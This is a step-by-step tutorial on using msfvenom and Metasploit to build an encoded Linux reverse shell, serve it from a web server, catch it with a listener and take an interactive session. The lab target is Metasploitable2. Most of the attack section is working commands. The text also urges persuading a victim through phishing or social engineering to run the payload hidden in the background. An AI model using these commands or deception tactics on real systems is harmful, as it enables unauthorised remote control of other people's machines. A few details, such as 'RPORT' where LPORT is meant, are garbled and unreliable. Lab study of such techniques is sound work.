How to Create and Use a Reverse Shell Using Metasploit

Introduction

Before we begin talking about how to create and use a reverse shell using Metasploit, let's briefly understand – What is Metasploit?

Metasploit is a powerful penetration testing tool used to identify vulnerabilities in computer systems. Developed by Rapid7, it allows cybersecurity professionals to exploit these weaknesses, helping organizations improve their security defenses. Its user-friendly interface and extensive features make it a popular choice for researchers and ethical hackers.

A reverse shell is a technique commonly used in cybersecurity and ethical hacking. It involves establishing a connection from a target device back to the attacker's machine, essentially giving the attacker control over the target's command-line interface. This method allows the attacker to execute commands and control various aspects of the compromised device remotely.

When you should use a Reverse Shell?

When your target machine is protected by a firewall, using a reverse shell is the most efficient option. All outgoing request connections are accepted by the firewall, even though it may deny incoming abnormal request connections within its network.

In the second scenario, you discover that your target system is not using any services as bind shells, and you are unsure of the shell and payload you should use to carry out the exploitation.

How to Construct a Shell Payload in Reverse

With MSFvenom, Metasploit is a powerful exploitation package that can produce a wide variety of payloads. MSFvenom unifies these tools under a single framework by combining the features of Msfencode (payload encoding) and Msfpayload (payload generation).

To build a payload using MSFvenom, you must have both the -p (payload) and -f (output format) parameters set. Use the following command to see every reverse payload:

msfvenom -l all | grep reverse

Output:

Target payloads for MSFvenom are diverse and include operating systems (Windows, Linux, OSX, Solaris, BSD), mobile devices (Android & Apple), and numerous language-based applications (PHP, Python, R, Ruby, Java, and CMD).

Common Reverse Shell for Windows

windows/meterpreter/reverse is the version of the Windows reverse shell that is commonly used. Furthermore, as the network activity of these payloads tends to be slightly less irregular, you can use another payload like windows/meterpreter/reverse_http or windows/meterpreter/reverse_https.

Common Reverse Shell for Linux

Payloads like linux/x86/meterpreter/reverse_tcp or its 64-bit equivalent can be tested on Linux computers. Out of them all, linux/x86/shell_reverse_tcp has shown to be the most stable.

We will show you how to take use of the Linux system in this lesson. Our target in this instance is the Metasploitable2 system. A popular operating system in server-side technology is Linux. Gaining experience in attacking Linux systems will help you become more proficient at taking on larger targets.

Make a Linux System-Targeting Reverse Shell Payload

In this case, our payload is saved to our webserver, which runs Kali Linux and is found in the location /var/www/html. First, launch the webserver service by issuing the following command:

sudo service apache2 start

Next, we need to use the following command to set the permissions so that our payload file may be stored on the web server:

sudo chmod 777 /var/www/html -R

Next, the payload is made. To construct a reverse shell payload that targets the Linux system, run the following command:

sudo msfvenom -a x86 --platform=linux -p linux/x86/shell/reverse_tcp LHOST=192.168.69.4 LPORT=6969 -e x86/shikata_ga_nai -f elf > /var/www/html/rev_shell.elf

• -a: The target architecture (x86 or x64 bit)
• -platform: The target platform (Linux, Windows, mobile device, etc)
• -p: The payload (followed by the LHOST and LPORT to connect back to)
• LHOST: Our Kali Linux machine IP address
• LPORT: Our Kali Linux machine port to handle the listener service
• -e: The encoder type
• -f: The output format

Recall that the parameters -p (payload) and -f (output format) are required. You can leave the other options off and let MSFvenom to use the payload to decide the default characteristics. But take note that in order to determine the target's return connection point, the reverse shell payload requires the LHOST and RPORT inputs.

In case you're wondering, a .elf file is essentially an executable file under Linux systems, similar to a .exe file on Windows. Adding ./ (the dot slash) before the file name makes running a .elf file identical to calling other executable files on Linux.

How to Use a Reverse Shell

We proceed to generate a payload file from this stage. We need to first set up a listener on our Kali Linux machine before we can transfer the file to the target. Likewise, we are therefore prepared to handle the request and establish the connection if the target tries to execute the file.

Step 1: On the attacker's machine, set up a listener (attacker side)

Enter the following command in the terminal when the Metasploit Framework console is open.

msfconsole

Assign the exploit and payload name to multi-handler and payload generation, respectively, as we did earlier.

Setting the necessary settings is the final configuration step. Execute the subsequent command to see the options type:

show options

To accommodate our previous payload generation, modify the necessary payload options. Thus, we configure the LPORT to 6969 and the LHOST to the IP of our Kali Linux computer, also known as localhost or the explicit local IP address.

After the exploit configuration is complete, simply type the following to launch the listener in the background:

run -j

As of this stage, Metasploit is waiting for an incoming reverse shell connection on port 6969.

Step 2: Payload delivery to the target (target side)

Our payload file has to be run on the target now. It is your responsibility to persuade the victim to download and execute the payload. You may combine a phishing website with a social engineering attack, or both.

In our example, both the attacker (us) and the target are connected to the same local network. The payload file is uploaded by the attacker to the website's server. The target only needs to download the payload because they have access to the attacker's web server.

Recall that during the last payload creation, we generated a payload file called rev_shell.elf and placed it in the web server directory's /var/www/html/ homepage. We only need to send a request to <the attacker IP/rev_shell.elf> in order to see or download the target file. The target may choose to use any web browser or the following version of the wget command:

wget 192.168.69.4/rev_shell.elf

Step 3: Convince the Target to Run the Payload (Target Side)
The device used by our attacker is prepared and waiting for a connection. The payload file has already been downloaded by the target. Persuading the target to execute the payload file is your last mission. Persuade the target to run the payload file in the background by giving it executable permissions first. Indeed, in the background.

Persuade the target to execute the following command in order to grant permission for the payload file:

chmod +x rev_shell.elf

Next, use the following command to instruct the target to launch the payload file:

./rev_shell.elf &

In order to prevent the target from simply stopping the payload file from running, the terminal is instructed to run it in the background using the last & sign.

View the Metasploit console once the payload has been executed by the target. It should be visible to you that an inbound connection has been made. It notifies you that a new session has begun if it is successful.

Simply type sessions to see a list of all available sessions.

You must call the shell with the session ID in order to communicate with it during that particular session. There is only one target in our scenario, and it has ID 1. Utilize the subsequent command to communicate with the reverse shell.

sessions -i 1

You now own reverse shell. It resembles our target's Linux terminal exactly. Congratulations! You've effectively taken control of your target system.

FAQs to Create and Use a Reverse Shell Using Metasploit

Conclusion

We hope this tutorial helped you understand how to create and use a reverse shell using Metasploit.

If you have any queries, please leave a comment below, and we’ll be happy to respond to them for sure.